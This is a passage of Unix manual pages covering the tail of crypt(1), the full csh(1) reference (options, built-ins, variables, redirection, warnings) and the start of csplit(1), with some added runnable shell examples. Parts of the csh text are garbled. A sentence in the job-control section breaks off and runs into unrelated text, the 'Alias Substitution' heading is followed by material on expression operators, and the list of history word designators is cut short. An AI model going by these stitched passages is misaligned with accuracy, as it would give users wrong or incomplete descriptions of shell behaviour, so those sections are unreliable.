Security of encrypted files depends on three factors: the fundamental method must be hard to solve;
direct search of the key space must be infeasible; ‘‘sneak paths’’ by which keys or clear text can become
visible must be minimized.
crypt implements a one-rotor machine designed along the lines of the German Enigma, but with a 256-
element rotor. Methods of attack on such machines are widely known; thus crypt provides minimal secu-
rity.
The transformation of a key into the internal settings of the machine is deliberately designed to be expen-
sive; i.e., to take a substantial fraction of a second to compute. However, if keys are restricted to, for
example, three lowercase letters, then encrypted files can be read by expending only a substantial frac-
tion of five minutes of machine time.
Since the key is an argument to the crypt command, it is potentially visible to users executing ps
or a derivative (see ps (1)). The choice of keys and key security are the most vulnerable aspects of crypt.
EXAMPLES
The following example demonstrates the use of crypt to edit a file that the user wants to keep strictly
confidential:
$ crypt <plans >plans.x
key: violet
$ rm plans
...
$ vi -x plans.x
key: violet
...
:wq
$
...
$ crypt <plans.x | pr
key: violet
Note that the -x option is the encryption mode of vi, and prompts the user for the same key with which
the file was encrypted.
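crypt is rarely present on modern systems. Where it is unavailable, the same edit-encrypted-file workflow can be sketched with openssl enc; the openssl command and its -pbkdf2 option are assumptions here, not part of this manual:

```shell
# Encrypt, delete the cleartext, and later decrypt for viewing --
# mirroring the crypt example above with openssl enc (assumed available).
cd /tmp
echo "the plans" > plans
openssl enc -aes-256-cbc -pbkdf2 -pass pass:violet -in plans -out plans.x
rm plans
openssl enc -d -aes-256-cbc -pbkdf2 -pass pass:violet -in plans.x
```

Note that pass:violet on the command line is visible to ps(1), the same exposure this page describes for crypt.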
FILES
/dev/tty for typed key
SEE ALSO
ed(1), makekey(1), stty(1).
csh(1) csh(1)
NAME
csh - a shell (command interpreter) with C-like syntax
SYNOPSIS
csh [-cefinstvxTVX] [ command_file ] [ argument_list ... ]
DESCRIPTION
csh is a command language interpreter that incorporates a command history buffer, C-like syntax, and
job control facilities.
Command Options
Command options are interpreted as follows:
-c Read commands from the (single) following argument which must be present. Any
remaining arguments are placed in argv.
-e C shell exits if any invoked command terminates abnormally or yields a non-zero exit
status.
-f Suppress execution of the .cshrc file in your home directory, thus speeding up shell
start-up time.
-i Force csh to respond interactively when called from a device other than a computer ter-
minal (such as another computer). csh normally responds non-interactively. If csh is
called from a computer terminal, it always responds interactively, regardless of which
options are selected.
-n Parse but do not execute commands. This is useful for checking syntax in shell scripts.
All substitutions are performed (history, command, alias, etc.).
-s Take command input from the standard input.
-t Read and execute a single line of input.
-v Set the verbose shell variable, causing command input to be echoed to the standard
output device after history substitutions are made.
-x Set the echo shell variable, causing all commands to be echoed to the standard error
immediately before execution.
-T Disable the tenex features which use the ESC key for command/file name completion and
CTRL-D for listing available files (see the CSH UTILITIES section below).
-V Set the verbose variable before .cshrc is executed so that all .cshrc commands
are also echoed to the standard output.
-X Set the echo variable before .cshrc is executed so that all .cshrc commands are
also echoed to the standard output.
After processing the command options, if arguments remain in the argument list, and the -c, -i, -s, or
-t options were not specified, the first remaining argument is taken as the name of a file of commands to
be executed.
COMMANDS
A simple command is a sequence of words, the first of which specifies the command to be executed. A
sequence of simple commands separated by vertical bar (|) characters forms a pipeline. The output of
each command in a pipeline becomes the input for the next command in the pipeline. Sequences of pipe-
lines can be separated by semicolons (;) which causes them to be executed sequentially. A sequence of
pipelines can be executed in background mode by adding an ampersand character (&) after the last entry.
Any pipeline can be placed in parentheses to form a simple command which, in turn, can be a component
of another pipeline. Pipelines can also be separated by | | or && indicating, as in the C language, that
the second pipeline is to be executed only if the first fails or succeeds, respectively.
Jobs
csh associates a job with each pipeline and keeps a table of current jobs (printed by the jobs com-
mand) and assigns them small integer numbers. When a job is started asynchronously using &, the shell
prints a line resembling:
[1] 1234
indicating that the job which was started asynchronously was job number 1 and had one (top-level) pro-
cess, whose process id was 1234.
If you are running a job and want to do something else, you can type the currently defined suspend char-
acter (see termio (7)) which sends a stop signal to the current job. csh then normally indicates that the
job has been ‘Stopped’, and prints another prompt. You can then manipulate the state of this job, putting
it in the background with the bg command, run some other commands, and then eventually bring the job
back into the foreground with the foreground command fg. A suspend takes effect immediately and is
like an interrupt in that pending output and unread input are discarded when it is typed. There is a
delayed suspend character which does not generate a stop signal until a program attempts to read (2) it.
This can usefully be typed ahead when you have prepared some commands for a job which you want to
stop after it has read them.
A job being run in the background stops if it tries to read from the terminal. Background jobs are nor-
mally allowed to produce output, but this can be disabled by giving the command stty tostop (see
stty (1)). If you set this tty option, background jobs stop when they try to produce output, just as they do
when they try to read input. Keyboard signals and line-hangup signals from the terminal interface are
not sent to background jobs on such systems. This means that background jobs are immune to the effects
of logging out or typing the interrupt, quit, suspend, and delayed suspend characters (see termio (7))., typing %1 & resumes job 1
in the background. Jobs can also be named by prefixes of the string typed in to start them if these
prefixes are unambiguous; thus %ex normally restarts a suspended ex(1) job, if there is only one
suspended job whose name begins with the string ex. It is also possible to say %?string which
specifies a job whose text contains string , if there is only one such job.
csh maintains a notion of the current and previous jobs. In output pertaining to jobs, the current job is
marked with a + and the previous job with a -. The abbreviation %+ refers to the current job and %-
refers to the previous job. For close analogy with the syntax of the history mechanism (described below),
%% is also a synonym for the current job.
csh learns immediately whenever a process changes state. It normally informs you whenever a job
becomes blocked so that no further progress is possible, but only just before printing a prompt. This is
done so that it does not otherwise disturb your work. If, however, you set the shell variable notify,
csh notifies you immediately of changes in status of background jobs. There is also a csh built-in com-
mand called notify which marks a single process so that any status change is immediately reported.
By default, notify marks the current process. Simply type notify after starting a background job to
mark it.
If you try to leave the shell while jobs are stopped, csh sends the warning message: You have
stopped jobs. Use the jobs command to see what they are. If you do this or immediately try to exit
again, csh does not warn you a second time, and the suspended jobs are terminated (see exit (2)).
Built-In Commands
Built-in commands are executed within the shell without spawning a new process. If a built-in command
occurs as any component of a pipeline except the last, it is executed in a subshell. The built-in commands
are:
alias
alias name
alias name wordlist
The first form prints all aliases. The second form prints the alias for name. The third form
assigns the specified wordlist as the alias of name. Command and file name substitution
are performed on wordlist . name cannot be alias or unalias.
bg [ %job ... ]
Put the current (job not specified) or specified jobs into the background, continuing them
if they were stopped.
breaksw
Causes a break from a switch, resuming after the endsw.
case label :
A label in a switch statement as discussed below.
cd
cd directory_name
chdir
chdir directory_name
Change the shell’s current working directory to directory_name. If not specified,
directory_name defaults to your home directory.
If directory_name is not found as a subdirectory of the current working directory (and does
not begin with /, ./, or ../), each component of the variable cdpath is checked to see if it
has a subdirectory directory_name. Finally, if all else fails, csh treats directory_name as
a shell variable. If its value begins with /, this is tried to see if it is a directory. See also
cd(1).
continue
Continue execution of the nearest enclosing while or foreach. The rest of the com-
mands on the current line are executed.
default:
Labels the default case in a switch statement. The default should come after all other
case labels.
dirs Prints the directory stack; the top of the stack is at the left; the first directory in the stack
is the current directory.
echo wordlist
echo -n wordlist
The specified words are written to the shell’s standard output, separated by spaces, and ter-
minated with a new-line unless the -n option is specified. See also echo (1).
else
end
endif
endsw See the descriptions of the foreach, if, switch, and while statements below.
eval arguments ...
(Same behavior as sh(1).) arguments are read as input to the shell and the resulting
command(s) executed. This is usually used to execute commands generated as the result of
command or variable substitution, since parsing occurs before these substitutions.
exec command
The specified command is executed in place of the current shell.
exit
exit (expression )
csh exits either with the value of the status variable (first form) or with the value of the
specified expression (second form).
fg [ %job ... ]
Brings the current (job not specified) or specified jobs into the foreground, continuing them
if they were stopped.
foreach name (wordlist )
...
end The variable name is successively set to each member of wordlist and the sequence of com-
mands between this command and the matching end are executed. (Both foreach and
end must appear alone on separate lines.)
The built-in command continue can be used to continue the loop prematurely; the built-
in command break to terminate it prematurely. When this command is read from the
terminal, the loop is read once, prompting with ? before any statements in the loop are
executed. If you make a mistake while typing in a loop at the terminal, use the erase or
line-kill character as appropriate to recover.
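A minimal foreach loop, written to a script file and run non-interactively (the presence of csh itself is assumed):

```shell
# Run a csh foreach loop from a script file with csh -f.
cat > /tmp/each.csh <<'EOF'
foreach f (alpha beta gamma)
    echo $f
end
EOF
csh -f /tmp/each.csh
```

Prints alpha, beta, and gamma on separate lines.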
glob wordlist
Like echo but no \ escapes are recognized and words are delimited by null characters in
the output. Useful in programs that use the shell to perform file name expansion on a list
of words.
hashstat
Print a statistics line indicating how effective the internal hash table has been at locating
commands (and avoiding execs). An exec is attempted for each component of the path
where the hash function indicates a possible hit, and in each component that does not begin
with a /.
history [-h] [-r] [ n ]
Displays the history event list. If n is given, only the n most recent events are printed. The
-r option reverses the order of printout to be most recent first rather than oldest first. The
-h option prints the history list without leading numbers for producing files suitable for the
source command.
if (expression ) command
If expression evaluates true, the single command with arguments is executed. Variable
substitution on command happens early, at the same time it does for the rest of the if
command. command must be a simple command; not a pipeline, a command list, a
parenthesized command list, or an aliased command. Input/output redirection occurs even
if expression is false, meaning that command is not executed (this is a bug).
if (expression1 ) then
...
else if (expression2 ) then
...
else
...
endif If expression1 is true, all commands down to the first else are executed; otherwise if
expression2 is true, all commands from the first else down to the second else are exe-
cuted, etc. Any number of else-if pairs are possible, but only one endif is needed.
The else part is likewise optional. (The words else and endif must appear at the
beginning of input lines. The if must appear alone on its input line or after an else.)
jobs [-l]
Lists active jobs. The -l option lists process IDs in addition to the usual information.
kill % job
kill - sig % job ...
kill pid
kill - sig pid ...
kill -l
Sends either the TERM (terminate) signal or the specified signal to the specified jobs or
processes. Signals are either given by number or by names (as given in
/usr/include/signal.h, stripped of the SIG prefix (see signal (2)). The signal
names are listed by kill -l. There is no default, so kill used alone does not send a
signal to the current job. If the signal being sent is TERM (terminate) or HUP (hangup),
the job or process is sent a CONT (continue) signal as well. See also kill (1).
limit[-h][ resource ][ maximum_use ]
Limits the usage by the current process and each process it creates not to (individually)
exceed maximum_use on the specified resource . If maximum_use is not specified, then the
current limit is displayed; if resource is not specified, then all limitations are given.
If the -h flag is specified, the hard limits are used instead of the current limits. The hard
limits impose a ceiling on the values of the current limits. Only the superuser can raise
the hard limits.
popd [ +n ]
Pops the directory stack and returns to the new top directory. The argument +n discards
the n th entry in the stack. The elements of the directory stack are numbered from 0 start-
ing at the top. A synonym for popd, called rd, is provided for historical reasons. Its use is
not recommended because it is not part of the standard BSD csh and may not be sup-
ported in future releases.
pushd [ name ] [ +n ]
With no arguments, pushd exchanges the top two elements of the directory stack. Given a
name argument, pushd changes to the new directory (using cd) and pushes the old current
working directory onto the directory stack. With a numeric argument, pushd
rotates the n th argument of the directory stack around to be the top element and changes
to that directory. The members of the directory stack are numbered from the top starting
at 0. A synonym for pushd , called gd, is provided for historical reasons. Its use is not
recommended since it is not part of the standard BSD csh and may not be supported in
future releases.
set
set name
set name=word
set name[index ]=word
set name=(wordlist )
The first form shows the value of all shell variables. Variables whose value is other
than a single word print as a parenthesized word list. The second form sets name to the
null string. The third form sets name to the single word . The fourth form sets the
index ’th component of name to word ; this component must already exist. The final form
sets name to the list of words in wordlist . In all cases the value is command and file-name expanded.
These arguments can be repeated to set multiple values in a single set command. Note,
however, that variable expansion happens for all arguments before any setting occurs.
setenv name value
Sets the value of environment variable name to be value , a single string. The most com-
monly used environment variables, USER, TERM, and PATH, are automatically imported to
and exported from the csh variables user , term , and path ; there is no need to use
setenv for these.
shift [ variable ]
If no argument is given, the members of argv are shifted to the left, discarding argv[1].
An error occurs if argv is not set or has less than two strings assigned to it. When vari-
able is specified, shift performs the same function on the specified variable .
source [-h] name
csh reads commands from name. source commands can be nested, but if nested too
deeply the shell may run out of file descriptors or reach the max stack size (see maxssiz (5)).
An error in a source at any level terminates all nested source commands. Normally,
input during source commands is not placed on the history list. The -h option can be
used to place commands in the history list without executing them.
stop [ %job ... ]
Stops the current (no argument) or specified jobs executing in the background.
suspend
Causes csh to stop as if it had been sent a suspend signal. Since csh normally ignores
suspend signals, this is the only way to suspend the shell. This command gives an error
message if attempted from a login shell.
switch (string )
case str1 :
...
breaksw
...
default:
...
breaksw
endsw Each case label (str1 ) is successively matched against the specified string which is first
command and file name expanded. The form of the case labels is the Pattern Matching
Notation with the exception that non-matching lists in bracket expressions are not sup-
ported (see regexp (5)). If none of the labels match before a default label is found, the
execution begins after the default label. Each case label and the default label
must appear at the beginning of a line. The breaksw command causes execution to continue
after the endsw. Otherwise, control may fall through case labels and default
labels as in C. If no label matches and there is no default, execution continues after the
endsw.
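A switch statement with its labels at the beginning of their lines, as required above (run with csh -f; csh is assumed to be installed):

```shell
# A csh switch: only the matching case's commands run.
cat > /tmp/sw.csh <<'EOF'
set color = red
switch ($color)
case red:
    echo stop
    breaksw
case green:
    echo go
    breaksw
default:
    echo unknown
endsw
EOF
csh -f /tmp/sw.csh
```

Prints stop. Case labels are matched with Pattern Matching Notation, so a label such as gr* would match green.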
time [ command ]
When command is not specified, a summary of time used by this shell and its children is
printed. If specified, the simple command is timed and a time summary as described under
the time variable is printed. If necessary, an extra shell is created to print the time
statistic when the command completes.
umask [ value ]
The current file creation mask is displayed (value not specified) or set to the specified
value . The mask is given in octal. Common values for the mask are 002, which gives all
permissions to the owner and group and read and execute permissions to all others, or 022,
which gives all permissions to the owner, and only read and execute permission to the
group and all others. See also umask(1).
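As an illustrative sketch (not part of the original manual), the effect of the mask can be observed from a POSIX shell; the umask built-in behaves the same way in csh:

```shell
#!/bin/sh
# With umask 022, files are created without write permission for
# group and others (666 & ~022 = 644).
umask 022
f=$(mktemp -u /tmp/umask_demo.XXXXXX)   # mktemp -u: generate a name only
: > "$f"                                # create an empty file under the mask
ls -l "$f" | cut -c1-10                 # prints -rw-r--r--
rm -f "$f"
```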
unalias pattern
All aliases whose names match the specified pattern are discarded. Thus, all aliases are
removed by unalias *. No error occurs if pattern does not match an existing alias.
unhash
Use of the internal hash table to speed location of executed programs is disabled.
unset pattern
All variables whose names match the specified pattern are removed. Thus, all variables are
removed by unset *; this has noticeably undesirable side-effects. No error occurs if pat-
tern matches nothing.
unsetenv pattern
Removes all variables whose names match the specified pattern from the environment. See
also the setenv command above and printenv (1).
wait Waits for all background jobs to terminate. If the shell is interactive, an interrupt can dis-
rupt the wait, at which time the shell prints names and job numbers of all jobs known to be
outstanding.
while (expression )
...
end While the specified expression evaluates non-zero, the commands between the while and
the matching end are evaluated. break and continue can be used to terminate or
continue the loop prematurely. (The while and end must appear alone on their input
lines.) If the input is a terminal (i.e., not a script), prompting occurs the first time through
the loop as for the foreach statement.
%job Brings the specified job into the foreground.
%job & Continues the specified job in the background.
@
@ name =expression
@ name [index ]=expression
The first form prints the values of all the shell variables. The second form sets the specified
name to the value of expression . If the expression contains <, >, &, or |, at least this part
of the expression must be placed within parentheses. The third form assigns the value of
expression to the index th argument of name. Both name and its index th component must
already exist.
The operators *=, +=, etc., are available as in C. White space can optionally separate the
name from the assignment operator. However, spaces are mandatory in separating com-
ponents of expression which would otherwise be single words.
Special postfix ++ and -- operators increment and decrement name, respectively (e.g.,
@ i++).
History Substitutions
History substitutions enable you to repeat commands, use words from previous commands as portions of
new commands, repeat arguments of a previous command in the current command, and fix spelling or
typing mistakes in an earlier command.
History substitutions begin with an exclamation point (!). Substitutions can begin anywhere in the input
stream, but cannot be nested. The exclamation point can be preceded by a backslash to cancel its special
meaning. For convenience, an exclamation point is passed to the parser unchanged when it is followed by
a blank, tab, newline, equal sign, or left parenthesis. Any input line that contains history substitution is
echoed on the terminal before it is executed for verification.
Commands input from the terminal that consist of one or more words are saved on the history list. The
history substitutions reintroduce sequences of words from these saved commands into the input stream.
The number of previous commands saved is controlled by the history variable. The previous com-
mand is always saved, regardless of its value. Commands are numbered sequentially from 1.
You can refer to previous events by event number (such as !10 for event 10), relative event location
(such as !-2 for the second previous event), full or partial command name (such as !d for the last event
using a command with initial character d), and string expression (such as !?mic? referring to an event
containing the characters mic).
These forms, without further modification, simply reintroduce the words of the specified events, each
separated by a single blank. As a special case, !! is a re-do; it refers to the previous command.
To select words from a command, use a colon (:) and a designator for the desired words after the event
specification. The words of an input line are numbered from zero. The basic word designators are:
0 First word (i.e., the command name itself).
n nth word.
A quick substitution of the form ˆoldˆnew repeats the previous command, replacing old with new in the
text of the previous line. Thus ˆlbˆlib fixes a mistyped lb in the previous command.
Alias Substitution
Components of an expression should be surrounded by white space if they contain characters significant to the
parser: -, &, |, <, >, (, and ).
Also available in expressions as primitive operands are command executions enclosed in curly braces
( { } ) and file enquiries of the form -l filename, where l is one of:
r read access
w write access
x execute access
e existence
o ownership
z zero size
f plain file
d directory
The specified filename is command- and file-name expanded, then tested to see if it has the specified rela-
tionship to the real user. If the file does not exist or is inaccessible, all inquiries return false (0). Com-
mand executions succeed, returning true (1), if the command exits with status 0; otherwise they fail,
returning false (0). The shell contains a number of commands that can be used to regulate the flow of
control in command files (shell scripts) and, in limited but useful ways, from terminal input.
CSH VARIABLES
csh maintains a set of variables. Each variable has a value equal to zero or more strings (words). Vari-
ables have names consisting of up to 80 letters and digits starting with a letter. The underscore character
is considered a letter. The value of a variable may be displayed and changed by using the set and
unset commands. Some of the variables are Boolean, that is, the shell does not care what their value is,
only whether they are set or not.
Some operations treat variables numerically. The at sign (@) command permits numeric calculations to
be performed and the result assigned to a variable. The null string is considered to be zero, and any sub-
sequent words of multi-word values are ignored.
After the input line is aliased and parsed, and before each command is executed, variable expansion is
performed keyed by the dollar sign ($) character. Variable expansion can be prevented by preceding the
dollar sign with a backslash character (\) except within double quotes (") where substitution always
occurs. Variables are never expanded if enclosed in single quotes. Strings quoted by grave accents (‘) are
interpreted later (see Command Substitution), so variable substitution does not occur there until later, if
at all. A dollar sign is passed unchanged if followed by a blank, tab, or end-of-line.
Input/output redirections are recognized before variable expansion, and are variable expanded
separately. Otherwise, the command name and entire argument list are expanded together.
Unless enclosed in double quotes or given the :q modifier, the results of variable substitution may even-
tually be command and file name substituted. Within double quotes, a variable whose value consists of
multiple words expands to (a portion of) a single word, with the words of the variable's value separated
by blanks. Except as noted, it is an error to reference a variable that is not set.
$variable_name
${variable_name }
When interpreted, this sequence is replaced by the words of the value of the variable
variable_name , each separated by a blank. Braces insulate variable_name from subse-
quent characters that would otherwise be interpreted to be part of the variable name itself.
If variable_name is not a csh variable, but is set in the environment, that value is used.
Non-csh variables cannot be modified as shown below.
$variable_name[selector]
${variable_name[selector] }
This modification selects only some of the words from the value of variable_name. The
selector is subjected to variable substitution, and can consist of a single number or two
numbers separated by a dash. The first word of a variable’s value is numbered 1. If the
first number of a range is omitted it defaults to 1. If the last member of a range is omitted
it defaults to the total number of words in the variable ($#variable_name). An asterisk
metacharacter used as a selector selects all words.
$#variable_name
${#variable_name }
This form gives the number of words in the variable, and is useful for forms using a [selec-
tor ] option.
$0 This form substitutes the name of the file from which command input is being read. An
error occurs if the file name is not known.
$number
${number }
This form is equivalent to an indexed selection from the variable argv ($argv[number]).
$* This is equivalent to selecting all of argv ($argv[*]).
The modifiers :h, :t, :r, :q, and :x can be applied to the substitutions above, as can :gh, :gt, and
:gr. If curly braces ({ }) appear in the command form, the modifiers must appear within the braces.
The current implementation allows only one : modifier on each $ expansion.
The following substitutions cannot be modified with : modifiers:
$?variable_name
${?variable_name }
Substitutes the string 1 if variable_name is set, 0 if it is not.
$?0 Substitutes 1 if the current input file name is known, 0 if it is not.
$$ Substitutes the (decimal) process number of the (parent) shell.
$< Substitutes a line from the standard input, with no further interpretation thereafter. It can
be used to read from the keyboard in a shell script.
noglob If set, file name expansion is inhibited. This is most useful in shell scripts that are
not dealing with file names, or after a list of file names has been obtained and
further expansions are not desirable.
nonomatch If set, it is no longer an error for a file name expansion to not match any existing
files. If there is no match, the primitive pattern is returned. It is still an error for
the primitive pattern to be malformed. For example, ’echo [’ still gives an
error.
notify If set, csh notifies you immediately (through your standard output device) of back-
ground job completions. The default is unset (indicate job completions just before
printing a prompt).
path Each word of the path variable specifies a directory in which commands are to be
sought for execution. A null word specifies your current working directory. If there
is no path variable, only full path names can be executed. When path is not set and
when users do not specify full path names, csh searches for the command through
the directories . (current directory) and /usr/bin. A csh which is given neither
the -c nor the -t option normally hashes the contents of the directories in
the path variable after reading .cshrc, and each time the path variable is
reset. If new commands are added to these directories while the shell is active, it is
necessary to execute rehash for csh to access these new commands.
prompt This variable lets you select your own prompt character string. The prompt is
printed before each command is read from an interactive terminal input. If a !
appears in the string, it is replaced by the current command history buffer event
number unless a preceding \ is given. The default prompt is the percent sign (%)
for users and the # character for the super-user.
savehist The number of lines from the history list that are saved in ˜/.history when the
user logs out. Large values for savehist slow down the csh during startup.
shell This variable contains the name of the file in which the csh program resides. This
variable is used in forking shells to interpret files that have their execute bits set
but which are not executable by the system. (See the description of Non-Built-In
Command Execution ).
status This variable contains the status value returned by the last command. If the com-
mand terminated abnormally, 0200 is added to the status variable’s value. Built-in
commands which terminated abnormally return exit status 1, and all other built-in
commands set status to 0.
time This variable contains a numeric value that controls the automatic timing of com-
mands. If set, csh prints, for any command taking more than the specified
number of cpu seconds, a line of information to the standard output device giving
user, system, and real execution times plus a utilization percentage. The utilization
percentage is the ratio of user plus system times to real time. This message is
printed after the command finishes execution.
verbose This variable is set by the -v command line option. If set, the words of each com-
mand are printed on the standard output device after history substitutions have
been made.
Command Substitution
Command substitution is indicated by a command enclosed in grave accents (‘... ‘). The output from
such a command is normally broken into separate words at blanks, tabs and newlines, with null words
being discarded; this text then replacing the original string. Within double quotes, only newlines force
new words; blanks and tabs are preserved.
In any case, the single final newline does not force a new word. Note that it is thus possible for a com-
mand substitution to yield only part of a word, even if the command outputs a complete line.
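The word-splitting rule above can be sketched as follows (POSIX sh shown; csh splits backquoted output the same way):

```shell
#!/bin/sh
# Command-substitution output is broken into words at blanks, tabs,
# and newlines; the single final newline does not create an extra word.
set -- `printf 'alpha beta\ngamma\n'`
echo $#     # prints 3
echo "$2"   # prints beta
```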
Input/Output
The standard input and standard output of a command can be redirected with the following syntax:
< name Open file name (which is first variable, command and file name expanded) as the
standard input.
<< word Read the shell input up to a line which is identical to word. word is not subjected to
variable, file name or command substitution, and each input line is compared to
word before any substitutions are done on this input line. Unless a quoting \, ’, or
‘ appears in word, variable and command substitution is performed on the inter-
vening lines, allowing \ to quote $, \ and ‘.
> name
>! name
>& name
>&! name The file name is used as standard output. If the file does not exist, it is created; if
the file exists, it is truncated, and its previous contents are lost.
If the variable noclobber is set, the file must not exist or be a character special
file (e.g., a terminal or /dev/null) or an error results. This helps prevent
accidental destruction of files. In this case the exclamation point (!) forms can be
used to suppress this check.
The forms involving the ampersand character (&) route the standard error into the
specified file as well as the standard output. name is expanded in the same way as
< input file names are.
>> name
>>& name
>>! name
>>&! name Uses file name as standard output the same as >, but appends output to the end of
the file. If the variable noclobber is set, it is an error for the file not to exist
unless one of the ! forms is given. Otherwise, it is similar to >.
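A sketch of the noclobber check (csh: set noclobber, with >! to override; the POSIX sh equivalents set -C and >| are used here so the example is runnable in sh or bash):

```shell
#!/bin/sh
# With clobber protection enabled, plain > refuses to truncate an
# existing file; the override form must be used instead.
f=$(mktemp /tmp/noclobber_demo.XXXXXX)  # file now exists
set -C                                   # sh analogue of csh's set noclobber
if echo second > "$f" 2>/dev/null; then
    echo "overwritten"
else
    echo "refused: file exists"          # this branch is taken
fi
echo forced >| "$f"                      # >| is the analogue of csh's >!
cat "$f"                                 # prints forced
rm -f "$f"
```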
A command receives the environment in which the shell was invoked as modified by the input-output
parameters and the presence of the command in a pipeline. Thus, unlike some previous shells, com-
mands executed from a shell script have no access to the text of the commands by default; rather they
receive the original standard input of the shell. The << mechanism should be used to present inline
data. This permits shell scripts to function as components of pipelines and allows the shell to block-read
its input.
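The inline-data mechanism can be sketched as follows (POSIX sh command substitution shown; the << redirection itself is the same in csh):

```shell
#!/bin/sh
# A here-document supplies inline data as standard input; quoting the
# terminator word ('EOF') suppresses variable and command substitution.
count=$(wc -l <<'EOF'
first line
second line
third line
EOF
)
echo "$count"   # 3 (possibly padded with blanks, depending on wc)
```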
Diagnostic output can be directed through a pipe with the standard output. Simply use the form |&
rather than | by itself.
CSH UTILITIES
File Name Completion
In typing file names as arguments to commands, it is no longer necessary to type a complete name, only a
unique abbreviation is necessary. When you want the system to try to match your abbreviation, press the
ESC key. The system then completes the file name for you, echoing the full name on your terminal. If
the abbreviation does not match an available file name, the terminal’s bell is sounded. The file name may
be partially completed if the prefix matches several longer file names. In this case, the name is extended
up to the point of ambiguity, and the bell is sounded.
File name completion works equally well when other directories are addressed. In addition, the tilde (˜)
convention for home directories is understood in this context.
Autologout
A new shell variable has been added called autologout. If the terminal remains idle (no character
input) at the shell’s top level for a number of minutes greater than the value assigned to autologout,
you are automatically logged off. The autologout feature is temporarily disabled while a command is
executing. The initial value of autologout is 600. If unset or set to 0, autologout is entirely dis-
abled.
Sanity
C shell restores your terminal to a sane mode if it appears to return from some command in raw, cbreak,
or noecho mode.
EXTERNAL INFLUENCES
Environment Variables
LC_COLLATE determines the collating sequence used in evaluating pattern matching notation for file
name substitution.
LC_CTYPE determines the interpretation of text as single and/or multi-byte characters, the classification
of characters as letters, and the characters matched by character class expressions in pattern matching
notation.
LANG determines the language in which messages are displayed. If any internationalization vari-
able contains an invalid setting, csh behaves as if all internationalization variables are set to "C". See
environ(5).
WARNINGS
The .cshrc file should be structured such that it cannot generate any output on standard output or
standard error, including occasions when it is invoked without an affiliated terminal. rcp(1) causes
.cshrc to be sourced, and any output generated by this file, even to standard error, causes problems.
Commands such as stty (1) should be placed in .login, not in .cshrc, so that their output cannot affect
rcp (1).
csh has certain limitations. Words or environment variables can be no longer than 10240 characters.
The system limits argument lists to 10240 characters. The number of arguments to a command that
involves file name expansion is limited to one-sixth the number of characters allowed in an argument list.
When a command is restarted from a stop, csh prints the directory it started in if it is different from the
current directory; this can be misleading (i.e., wrong) because the job may have changed directories inter-
nally.
Shell built-in functions are not stoppable/restartable. Command sequences of the form a ; b ; c are
also not handled gracefully when stopping is attempted. If you interrupt b, the shell then immediately
executes c. This is especially noticeable if this expansion results from an alias. It suffices to place the
sequence of commands in parentheses to force it into a subshell; i.e., ( a ; b ; c ).
Because of the signal handling required by csh, interrupts are disabled just before a command is exe-
cuted, and restored as the command begins execution. There may be a few seconds delay between when a
command is given and when interrupts are recognized. Commands within loops, prompted for by ?, are
not placed in the history list. Control structure should be parsed rather than being recognized as
built-in commands. This would allow control commands to be placed anywhere, to be combined with |,
and to be used with & and ; metasyntax.
It should be possible to use the : modifiers on the output of command substitutions. More than one :
modifier should be allowed on $ substitutions.
Terminal type is examined only the first time you attempt recognition.
To list all commands on the system along PATH, enter [Space]-[Ctrl]-[D].
The csh metasequence !˜ does not work.
In an international environment, character ordering is determined by the setting of LC_COLLATE, rather
than by the binary ordering of character values in the machine collating sequence. This brings with it
certain attendant dangers, particularly when using range expressions in file name generation patterns.
For example, the command,
rm [a-z]*
might be expected to match all file names beginning with a lowercase alphabetic character. However, if
dictionary ordering is specified by LC_COLLATE, it would also match file names beginning with an
uppercase character (as well as those beginning with accented letters). Conversely, it would fail to match
letters collated after z in languages such as Norwegian.
The correct (and safe) way to match specific character classes in an international environment is to use a
pattern of the form:
rm [[:lower:]]*
This uses LC_CTYPE to determine character classes and works predictably for all supported languages
and codesets. For shell scripts produced on non-internationalized systems (or without consideration for
the above dangers), it is recommended that they be executed in a non-NLS environment. This requires
that LANG, LC_COLLATE, etc., be set to "C" or not set at all.
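The safe pattern can be checked with the shell's own matching; a minimal sketch in POSIX sh (csh uses the same bracket expressions for file name generation):

```shell
#!/bin/sh
# [[:lower:]] matches exactly the lowercase letters of the current
# locale, independent of collation order; a-z ranges depend on LC_COLLATE.
classify() {
    case $1 in
        [[:lower:]]) echo lower ;;
        [[:upper:]]) echo upper ;;
        *)           echo other ;;
    esac
}
classify a   # prints lower
classify Q   # prints upper
classify 7   # prints other
```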
csh implements command substitution by creating a pipe between itself and the command. If the root
file system is full, the substituted command cannot write to the pipe. As a result, the shell receives no
input from the command, and the result of the substitution is null. In particular, using command substi-
tution for variable assignment under such circumstances results in the variable being silently assigned a
NULL value.
Relative path changes (such as cd ..), when in a symbolically linked directory, cause csh’s knowledge
of the working directory to be along the symbolic path instead of the physical path.
Prior to HP-UX Release 9.0, csh, when getting its input from a file, would exit immediately if unable to
execute a command (such as if it was unable to find the command). Beginning at Release 9.0, csh con-
tinues on and attempts to execute the remaining commands in the file. However, if the old behavior is
desired for compatibility purposes, set the environment variable EXITONERR to 1.
AUTHOR
csh was developed by the University of California, Berkeley and HP.
FILES
˜/.cshrc A csh script sourced (executed) at the beginning of execution by each shell.
See WARNINGS
˜/.login A csh script sourced (executed) by login shell, after .cshrc at login.
˜/.logout A csh script sourced (executed) by login shell, at logout.
/etc/passwd Source of home directories for ˜name.
/usr/bin/sh Standard shell, for shell scripts not starting with a #.
/etc/csh.login A csh script sourced (executed) before ˜/.cshrc and ˜/.login when
starting a csh login (analogous to /etc/profile in the POSIX shell).
/tmp/sh* Temporary file for <<.
SEE ALSO
cd(1), echo(1), kill(1), nice(1), sh(1), umask(1), access(2), exec(2), fork(2), pipe(2), umask(2), wait(2),
tty(7), a.out(4), environ(5), lang(5), regexp(5).
C Shell tutorial in Shells Users Guide .
NAME
csplit - context split
SYNOPSIS
csplit [-s] [-k] [-f prefix ] [-n number] file arg1 [ ... argn ]
DESCRIPTION
csplit reads file , separates it into n+1 sections as defined by the arguments arg1 ... argn , and places
the results in separate files. The maximum number of arguments (arg1 through argn ) allowed is 99
unless the -n number option is used to allow for more output file names. If the -f prefix option is
specified, the resulting filenames are prefix 00 through prefix NN where NN is the two-digit value of n
using a leading zero if n is less than 10. If the -f prefix option is not specified, the default filenames
xx00 through xxNN are used. file is divided as follows:
Default Prefixed
Filename Filename Contents
xx00 prefix00 From start of file up to (but not including) the line
referenced by arg1.
xx01 prefix01 From the line referenced by arg1 up to the line
referenced by arg2.
.
.
.
xxNN prefixNN From the line referenced by argn to end of file.
If the file argument is -, standard input is used.
csplit supports the Basic Regular Expression syntax (see regexp (5)).
Options
csplit recognizes the following options:
-s Suppress printing of all character counts (csplit normally prints the character
